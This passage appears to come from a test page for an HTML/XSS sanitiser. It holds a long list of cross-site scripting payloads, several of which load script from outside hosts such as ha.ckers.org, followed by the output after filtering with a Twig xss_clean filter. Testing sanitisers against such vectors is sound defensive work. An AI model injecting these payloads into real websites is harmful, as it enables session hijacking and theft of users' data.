formaction=\\\"(123)\\\"&gt;crosssitespt\\r\\n&lt;frameset =alert&#40;123&#41;&gt;\\r\\n&lt;!--&lt;img src=\\\"--&gt;&lt;img src=x =alert&#40;123&#41;//\\\"&gt;\\r\\n&lt;style&gt;&lt;img src=\\\"&lt;/style&gt;&lt;img src=x =alert&#40;123&#41;//\\\"&gt;\\r\\n&lt;object data=\\\PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\"&gt;\\r\\n&lt;embed src=\\\PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\\\"&gt;\\r\\n&lt;embed src=\\\"(1)\\\"&gt;\\r\\n&lt;? foo=\\\"&gt;alert&#40;1&#41;\\\"&gt;\\r\\n&lt;! foo=\\\"&gt;alert&#40;1&#41;\\\"&gt;\\r\\n&lt;/ foo=\\\"&gt;alert&#40;1&#41;\\\"&gt;\\r\\n({0:#0=alert/#0#/#0#(123)})\\r\\nReferenceError.prototype.__defineGetter__(\\\'name\\\', function(){alert&#40;123&#41;}),x\\r\\nObject.__noSuchMethod__ = Function,[{}][0].constructor._(\\\'alert&#40;1&#41;\\\')()\\r\\n&lt;script src=\\\"#\\\"&gt;{alert&#40;1&#41;};1\\r\\ncrypto.generateCRMFRequest(\\\'CN=0\\\',0,0,null,\\\'alert&#40;1&#41;\\\',384,null,\\\'rsa-dual-use\\\')\\r\\n&lt;svg xmlns=\\\"#\\\"&gt;alert&#40;1&#41;&lt;/svg&gt;\\r\\n&lt;svg =\\\"(123)\\\" xmlns=\\\"#\\\"&gt;&lt;/svg&gt;\\r\\n&lt;iframe xmlns=\\\"#\\\" src=\\\"(1)\\\"&gt;&lt;/iframe&gt;\\r\\n\\r\\n\\r\\n"&gt;&lt;"\\r\\n">&lt;"\\r\\n\\r\\n“&gt;&lt;s”+”cript&gt;alert&#40;&#41;\\r\\n“&gt;alert&#40;&#41;\\r\\n“&gt;&lt;alert&#40;&#41;;//&lt;\\r\\nfooalert&#40;&#41;\\r\\nalert&#40;&#41;\\r\\n"/&gt;&lt;BODY src=http://my.box.com/xss.js&gt;")’&gt;\\r\\n‘; alert&#40;&#41;; var foo=’\\r\\nfoo\\\\’; alert&#40;&#41;;//’;\\r\\n&lt;script &gt;alert&#40;&#41;\\r\\n&lt;img src=asdf =alert&#40;&#41;&gt;\\r\\n&lt;BODY =alert&#40;’XSS’&#41;&gt;\\r\\nalert&#40;1&#41;\\r\\n\\\"&gt;alert&#40;String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101&#41;)\\r\\n&lt;video src=1 =alert&#40;1&#41;&gt;\\r\\n&lt;audio src=1 =alert&#40;1&#41;&gt;\\r\\n\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\';alert&#40;String.fromCharCode(88,83,83&#41;)//\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//\\\";alert&#40;String.fromCharCode(88,83,83&#41;)//--&gt;\\\"&gt;\\\'&gt;alert&#40;String.fromCharCode(88,83,83&#41;)\\r\\n\\\'\\\';!--\\\"&lt;XSS&gt;=&{()}\\r\\n0\\\\\\\"autofocus/=alert&#40;1&#41;--&gt;&lt;video/poster/=prompt&#40;2&#41;&gt;\\\"-confirm&#40;3&#41;-\\\"\\r\\n&lt;script/src=data:,alert&#40;&#41;&gt;\\r\\n&lt;marquee/=alert&#40;&#41;&gt;\\r\\n&lt;video/poster/=alert&#40;&#41;&gt;\\r\\n&lt;isindex/autofocus/=alert&#40;&#41;&gt;\\r\\n&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;\\r\\n&lt;IMG SRC=\\\"(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;IMG SRC=(\\\'XSS\\\')&gt;\\r\\n&lt;IMG SRC=(\\\'XSS\\\')&gt;\\r\\n&lt;IMG SRC=(\\\"XSS\\\")&gt;\\r\\n&lt;IMG SRC=`(\\\"RSnake says, \\\'XSS\\\'\\\")`&gt;\\r\\n&lt;a =\\\"alert&#40;&#41;\\\"&gt;xxs link&lt;/a&gt;\\r\\n&lt;a =alert&#40;&#41;&gt;xxs link&lt;/a&gt;\\r\\n&lt;IMG \\\"\\\"\\\"&gt;alert&#40;\\\"XSS\\\"&#41;\\\"&gt;\\r\\n&lt;IMG SRC=(String.fromCharCode(88,83,83))&gt;\\r\\n&lt;IMG SRC=# =\\\"alert&#40;\\\'xxs\\\'&#41;\\\"&gt;\\r\\n&lt;IMG SRC= =\\\"alert&#40;\\\'xxs\\\'&#41;\\\"&gt;\\r\\n&lt;IMG =\\\"alert&#40;\\\'xxs\\\'&#41;\\\"&gt;\\r\\n&lt;IMG SRC=/ =\\\"alert&#40;String.fromCharCode(88,83,83&#41;)\\\"&gt;&lt;/img&gt;\\r\\n&lt;IMG SRC=(\\r\\n'XSS')&gt;\\r\\n&lt;IMG SRC=\\r\\n#0000108ert('XSS')&gt;\\r\\n&lt;IMG SRC=('XSS')&gt;\\r\\n&lt;IMG SRC=\\\"(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;IMG SRC=\\\"(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;IMG SRC=\\\"(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;IMG SRC=\\\"(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;IMG SRC=\\\" &#14; (\\\'XSS\\\');\\\"&gt;\\r\\n&lt;SCRIPT/XSS SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;BODY !#$%&()*~+-_.,:;?@[/|\\\\]^`=alert&#40;\\\"XSS\\\"&#41;&gt;\\r\\n&lt;SCRIPT/SRC=\\\"http://ha.ckers.org/xss.js\\\"&gt;\\r\\n&lt;alert&#40;\\\"XSS\\\"&#41;;//&lt;\\r\\n&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt; B &gt;\\r\\n&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;\\r\\n&lt;IMG SRC=\\\"(\\\'XSS\\\')\\\"\\r\\n&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;\\r\\n\\\\\\\";alert&#40;\\\'XSS\\\'&#41;;//\\r\\nalert&#40;\\\'XSS\\\'&#41;;\\r\\n&lt;/TITLE&gt;alert&#40;\\\"XSS\\\"&#41;;\\r\\n&lt;INPUT TYPE=\\\"IMAGE\\\" SRC=\\\"(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;BODY BACKGROUND=\\\"(\\\'XSS\\\')\\\"&gt;\\r\\n&lt;IMG DYNSRC=\\\"(\\\'XSS\\\')\\\"&gt;\\r\\n&lt;IMG LOWSRC=\\\"(\\\'XSS\\\')\\\"&gt;\\r\\n&lt;STYLE&gt;li {list-style-image: url(\\\"(\\\'XSS\\\')\\\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS&lt;/br&gt;\\r\\n&lt;IMG SRC=\\\'(\\\"XSS\\\")\\\'&gt;\\r\\n&lt;IMG SRC=\\\"\\\"&gt;\\r\\n&lt;BODY =alert&#40;\\\'XSS\\\'&#41;&gt;\\r\\n&lt;BGSOUND SRC=\\\"(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;BR SIZE=\\\"&{alert&#40;\\\'XSS\\\'&#41;}\\\"&gt;\\r\\n&lt;LINK REL=\\\"stylesheet\\\" HREF=\\\"(\\\'XSS\\\');\\\"&gt;\\r\\n&lt;LINK REL=\\\"stylesheet\\\" HREF=\\\"http://ha.ckers.org/xss.css\\\"&gt;\\r\\n&lt;STYLE&gt;@import\\\'http://ha.ckers.org/xss.css\\\';&lt;/STYLE&gt;\\r\\n&lt;META HTTP-EQUIV=\\\"Link\\\" Content=\\\"&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet\\\"&gt;\\r\\n&lt;STYLE&gt;BODY{:url(\\\"http://ha.ckers.org/xssmoz.xml#xss\\\")}&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;@im\\\\port\\\'\\\\ja\\\\vasc\\\\ript:alert&#40;\\\"XSS\\\"&#41;\\\';&lt;/STYLE&gt;\\r\\n&lt;IMG TYPE=\\\"text/javascript\\\"&gt;alert&#40;\\\'XSS\\\'&#41;;&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;.XSS{background-image:url(\\\"(\\\'XSS\\\')\\\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;\\r\\n&lt;STYLE type=\\\"text/css\\\"&gt;BODY{background:url(\\\"(\\\'XSS\\\')\\\")}&lt;/STYLE&gt;\\r\\n&lt;XSS </p> <p>by z | at 2021-08-19 09:42:28</p> </div> <div class="col-sm-12"> <hr /> <p>result with twig: &#x7B;&#x25;&#x20;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;&#x7B;&#x7B;&#x20;&#x78;&#x73;&#x73;&#x2E;&#x78;&#x73;&#x73;&#x20;&#x7C;&#x20;&#x72;&#x61;&#x77;&#x20;&#x7D;&#x7D;&#x7B;&#x25;&#x20;&#x65;&#x6E;&#x64;&#x5F;&#x78;&#x73;&#x73;&#x5F;&#x63;&#x6C;&#x65;&#x61;&#x6E;&#x20;&#x25;&#x7D;:</p> <code class="break-word">&lt;style&gt;&lt;/style\\\\x3E&lt;img /&gt;&lt;/style&gt;\\r\\n&lt;style&gt;&lt;/style\\\\x0D&lt;img /&gt;&lt;/style&gt;\\r\\n&lt;style&gt;&lt;/style\\\\x09&lt;img /&gt;&lt;/style&gt;\\r\\n&lt;style&gt;&lt;/style\\\\x20&lt;img /&gt;&lt;/style&gt;\\r\\n&lt;style&gt;&lt;/style\\\\x0A&lt;img /&gt;&lt;/style&gt;\\r\\n\\\"\\\'`>ABC<div >DEF \\r\\n\\\"\\\'`>ABC<div >DEF \\r\\n\\r\\n\\r\\n\\r\\n\\\'`\\\">&lt;\\\\x3Cscript&gt;(1)\\r\\n\\\'`\\\"&gt;&lt;\\\\x00script&gt;(1)\\r\\n\\\"\\\'`&gt;&lt;\\\\x3Cimg src=xxx:x &gt;\\r\\n\\\"\\\'`&gt;&lt;\\\\x00img src=xxx:x &gt;\\r\\n\\r\\n\\r\\n\\r\\n\\r\\njavascript:alert&#40;1&#41;;\\r\\njavascript:alert&#40;1&#41;;\\r\\njavascript:alert&#40;1&#41;;\\r\\njavascript:alert&#40;1&#41;;\\r\\njavascript:alert&#40;1&#41;;\\r\\njavascript:alert&#40;1&#41;;\\r\\njavascript:alert&#40;1&#41;;\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\nABC&lt;div &gt;DEF\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n&lt;a &gt;test&lt;/a&gt;\\r\\n`\\\"\\\'&gt;&lt;img &gt;\\r\\n`\\\"\\\'&gt;&lt;img &gt;\\r\\n`\\\"\\\'&gt;&lt;img &gt;\\r\\n`\\\"\\\'&gt;&lt;img &gt;\\r\\n`\\\"\\\'&gt;&lt;img &gt;\\r\\n`\\\"\\\'&gt;&lt;img &gt;\\r\\n`\\\"\\\'&gt;&lt;img &gt;\\r\\n`\\\"\\\'&gt;&lt;img &gt;\\r\\n`\\\"\\\'&gt;&lt;img &gt;\\r\\n`\\\"\\\'&gt;&lt;img &gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"`\\\'&gt;\\r\\n\\\"/&gt;&lt;img/ /&gt;\\r\\n\\\"/&gt;&lt;img/ /&gt;\\r\\n\\\"/&gt;&lt;img/ /&gt;\\r\\n\\\"/&gt;&lt;img/ /&gt;\\r\\n\\\"/&gt;&lt;img/ /&gt;\\r\\n\\\"/&gt;&lt;img/ /&gt;\\r\\n\\\"/&gt;&lt;img/ /&gt;\\r\\n\\\"/&gt;&lt;img/ /&gt;\\r\\n\\\"/&gt;&lt;img/ /&gt;\\r\\njavascript:alert&#40;1&#41;\\r\\njavascript:alert&#40;1&#41;\\r\\njavascript:alert&#40;1&#41;\\r\\njavascript:alert&#40;1&#41;\\r\\njavascript:alert&#40;1&#41;\\r\\njavascript:alert&#40;1&#41;\\r\\njavascript:alert&#40;1&#41;\\r\\n`\\\"\\\'&gt;&lt;img &gt;\\r\\n`\\\"\\\'&gt;&lt;img &gt;\\r\\n`\\\"\\\'&gt;&lt;img &gt;\\r\\n`\\\"\\\'&gt;&lt;img &gt;\\r\\n`\\\"\\\'&gt;&lt;img &gt;\\r\\n`\\\"\\\'&gt;&lt;img &gt;\\r\\n`\\\"\\\'&gt;&lt;img &gt;\\r\\n\\r\\n&lt;img &gt;\\r\\n&lt;input autofocus&gt;\\r\\n&lt;input autofocus&gt;&lt;input autofocus&gt;\\r\\n&lt;video &gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;input autofocus&gt;\\r\\n&lt;form id=test &gt;&lt;input&gt;&lt;/form&gt;&lt;button &gt;X\\r\\n&lt;video&gt;&lt;&gt;\\r\\n&lt;video &gt;&lt;source&gt;\\r\\n&lt;form&gt;&lt;button &gt;X\\r\\n&lt;body &gt;&lt;input autofocus&gt;\\r\\n&lt;math href=\\\"(1)\\\"&gt;CLICKME&lt;/math&gt; &lt;math&gt; &lt;maction actiontype=\\\"statusline#http://google.com\\\" &gt;CLICKME&lt;/maction&gt; &lt;/math&gt;\\r\\n&lt;frameset &gt;\\r\\n&lt;table background=\\\"(1)\\\"&gt;\\r\\n&lt;!--&lt;img &gt;&lt;img &gt;\\r\\n&lt;comment&gt;&lt;img &gt;&lt;img &gt;\\r\\n&lt;![&gt;&lt;img &gt;&lt;img &gt;\\r\\n&lt;style&gt;&lt;img &gt;&lt;img &gt;\\r\\n&lt;li &gt; &lt;div &gt;\\r\\n&lt;embed src=\\\%(base64)s\\\"&gt;\\r\\n&lt;b 0\\r\\n&lt;div id=\\\"div1\\\"&gt;&lt;input value=\\\"``&gt;&lt;/div&gt; &lt;div id=\\\"div2\\\"&gt;&lt;/div&gt;\\r\\n&lt;x \\\'=\\\"foo\\\"&gt;&lt;x foo=\\\'&gt;&lt;img &gt;\\&gt;\\r\\n&lt;img &gt;\\&gt;\\r\\n\\r\\n&lt;div &gt;x\\r\\n&lt;? foo=\\\"&gt;\\\"&gt;\\r\\n&lt;! foo=\\\"&gt;\\\"&gt;\\r\\n&lt;/ foo=\\\"&gt;\\\"&gt;\\r\\n&lt;? foo=\\\"&gt;&lt;x foo=\\\'?&gt;\\\'&gt;\\\"&gt;\\r\\n&lt;! foo=\\\"[[[Inception]]\\\"&gt;&lt;x foo=\\\"]foo&gt;\\\"&gt;\\r\\n&lt;% foo&gt;&lt;x foo=\\\"%&gt;\\\"&gt;\\r\\n&lt;div id=d&gt;&lt;x xmlns=\\\"&gt;&lt;iframe &gt;&lt;/div&gt; \\r\\n&lt;img \\\\&gt;\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img\\\\&gt;\\r\\n&lt;img\\\\&gt;\\r\\n&lt;img\\\\&gt;\\r\\n&lt;img\\\\&gt;\\r\\n&lt;img\\\\&gt;\\r\\n&lt;img\\\\&gt;\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img \\\\&gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img[&gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;img &gt;\\r\\n&lt;a &gt;XXX&lt;/a&gt;\\r\\n&lt;img &gt;(1)\\\"` `&gt;\\r\\n&lt;img &gt;\\&gt;&lt;/title&gt;&lt;title title=&gt;\\r\\n&lt;a &gt;&lt;/a&gt;&lt;img &gt;&lt;img &gt;&lt;/a&gt;\\\"&gt;\\r\\n&lt;!--[if]&gt;\\r\\n&lt;!--[if&lt;img &gt; --&gt;\\&gt;&lt;/object&gt; &lt;object classid=\\\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\\\" &gt;&lt;param name=postdomevents /&gt;&lt;/object&gt;\\r\\n&lt;a &gt;X\\r\\n&lt;style&gt;p[foo=bar{}*{-o-link:\\\'(1)\\\'}{}*{-o-link-source:current}]{color:red};&lt;/style&gt;\\r\\n&lt;link rel=stylesheet href=data:,*{x:(1))}\\r\\n&lt;style&gt;@import \\\"data:,*{x:(1))}\\\";&lt;/style&gt;\\r\\n&lt;a &gt;&lt;a &gt;XXX&lt;/a&gt;&lt;/a&gt;&lt;a &gt;XXX&lt;/a&gt;\\r\\n&lt;style&gt;*[{}@import\\\'%(css)s?]&lt;/style&gt;X\\r\\n&lt;div ;color:red;\\\';\\\"&gt;XXX\\r\\n&lt;div &gt;XXX\\r\\n&lt;// &gt;\\r\\n&lt;style&gt;*{x:expression((1))}&lt;/style&gt;\\r\\n&lt;div &gt;&lt;/div&gt;\\r\\n&lt;div &gt;X\\r\\n&lt;div id=d&gt;&lt;div color\\\\3Ared\\\\3B\\\'\\\"&gt;X&lt;/div&gt;&lt;/div&gt; \\r\\n&lt;div &gt;X\\r\\n&lt;div &gt;X\\r\\n&lt;div id=\\\"x\\\"&gt;XXX&lt;/div&gt; &lt;style&gt; #x{font-family:foo[bar;color:green;} #y];color:red;{} &lt;/style&gt;\\r\\n&lt;x &gt;XXX&lt;/x&gt;\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n&lt;meta charset=\\\"x-imap4-modified-utf7\\\"&gt;&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi\\r\\n&lt;meta charset=\\\"x-imap4-modified-utf7\\\"&gt;&alert&A7&(1)&R&UA;&&&lt;&A9&11/script&X&&gt;\\r\\n&lt;meta charset=\\\"mac-farsi\\\"&gt;\\r\\n1&lt;set/xmlns=`urn:schemas-microsoft-com:time` attributename=`innerhtml` to=`&lt;img/src="x"&gt;\\r\\n1&lt;animate/xmlns=urn:schemas-microsoft-com:time attributename=innerhtml values=&lt;img/src="."&gt;\\r\\n&lt;vmlframe xmlns=urn:schemas-microsoft-com:vml src=%(vml)s#xss&gt;&lt;/vmlframe&gt;\\r\\n1&lt;a &gt;&lt;line xmlns=urn:schemas-microsoft-com:vml href=(1) strokecolor=white strokeweight=1000px from=0 to=1000 /&gt;&lt;/a&gt;\\r\\n&lt;a &gt;XXX&lt;/a&gt;\\r\\n&lt;x &gt;\\r\\n&lt;xml id=\\\"xss\\\" src=\\\"%(htc)s\\\"&gt;&lt;/xml&gt; &lt;label dataformatas=\\\"html\\\" datasrc=\\\"#xss\\\" datafld=\\\"payload\\\"&gt;&lt;/label&gt;\\r\\n&lt;event-source src=\\\"%(event)s\\\" &gt;\\r\\n&lt;a &gt;&lt;event-source src=\\\"data:application/x-dom-event-stream,Event:click data:XXX \\\"&gt;\\r\\n&lt;div id=\\\"x\\\"&gt;x&lt;/div&gt; &lt;xml:namespace prefix=\\\"t\\\"&gt; &lt;import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"&gt; &lt;t:set attributeName=\\\"innerHTML\\\" targetElement=\\\"x\\\" to=\\\"&lt;img&#11;src=x:x&#11;&#11;=(1)&gt;\\\"&gt;\\r\\n\\r\\n\\r\\n\\r\\n\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n\\r\\n&lt;FRAMESET&gt;&lt;FRAME SRC=\\\"(1);\\\"&gt;&lt;/FRAMESET&gt;\\r\\n&lt;BODY &gt;\\r\\n&lt;BODY &gt;\\r\\n&lt;IMG &gt;\\&gt;\\r\\n\\r\\n&lt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\r\\n&lt;IMG &gt;\\&gt;\\r\\n&lt;BR SIZE=\\\"&{(1)}\\\"&gt;\\r\\n&lt;LAYER SRC=\\\"%(scriptlet)s\\\"&gt;&lt;/LAYER&gt;\\r\\n&lt;LINK REL=\\\"stylesheet\\\" HREF=\\\"(1);\\\"&gt;\\r\\n&lt;STYLE&gt;@import\\\'%(css)s\\\';&lt;/STYLE&gt;\\r\\n&lt;META HTTP-EQUIV=\\\"Link\\\" Content=\\\"&lt;%(css)s&gt;; REL=stylesheet\\\"&gt;\\r\\n&lt;XSS &gt;\\r\\n&lt;STYLE&gt;li {list-style-image: url(\\\"(1)\\\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS\\r\\n&lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=(1);\\\"&gt;\\r\\n&lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http://;URL=(1);\\\"&gt;\\r\\n&lt;IFRAME SRC=\\\"(1);\\\"&gt;&lt;/IFRAME&gt;\\r\\n&lt;TABLE BACKGROUND=\\\"(1)\\\"&gt;\\r\\n&lt;TABLE&gt;&lt;TD BACKGROUND=\\\"(1)\\\"&gt;\\r\\n&lt;DIV url((1))\\\"&gt;\\r\\n&lt;DIV &gt;\\r\\n&lt;IMG &gt;\\&gt;\\&gt;(1);&lt;/STYLE&gt;\\r\\n&lt;STYLE&gt;.XSS{background-image:url(\\\"(1)\\\");}&lt;/STYLE&gt;&lt;A &gt;&lt;/A&gt;\\r\\n&lt;STYLE type=\\\"text/css\\\"&gt;BODY{background:url(\\\"(1)\\\")}&lt;/STYLE&gt;\\r\\n&lt;!--[if gte IE 4]&gt;&lt;![endif]--&gt;\\r\\n&lt;BASE HREF=\\\"(1);//\\\"&gt;\\r\\n&lt;OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"%(scriptlet)s\\\"&gt;&lt;/OBJECT&gt;\\r\\n&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=(1)&gt;&lt;/OBJECT&gt;\\r\\n&lt;HTML xmlns:xss&gt;&lt;?import namespace=\\\"xss\\\" implementation=\\\"%(htc)s\\\"&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;\\\"\\\"\\\",\\\"XML namespace.\\\"),(\\\"\\\"\\\"&lt;XML ID=\\\"xss\\\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\\\"javas&lt;!-- --&gt;cript:(1)\\\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=\\\"#xss\\\" DATAFLD=\\\"B\\\" DATAFORMATAS=\\\"HTML\\\"&gt;&lt;/SPAN&gt;\\r\\n&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=\\\"t\\\" ns=\\\"urn:schemas-microsoft-com:time\\\"&gt;&lt;?import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"&gt;&lt;t:set attributeName=\\\"innerHTML\\\" to=\\\"XSS&lt;SCRIPT DEFER&gt;(1)\\\"&gt;&lt;/BODY&gt;&lt;/HTML&gt;\\r\\n\\r\\n&lt;HEAD&gt;&lt;META HTTP-EQUIV=\\\"CONTENT-TYPE\\\" CONTENT=\\\"text/html; charset=UTF-7\\\"&gt; &lt;/HEAD&gt;\\r\\n&lt;form id=\\\"test\\\" /&gt;&lt;button &gt;X\\r\\n&lt;body 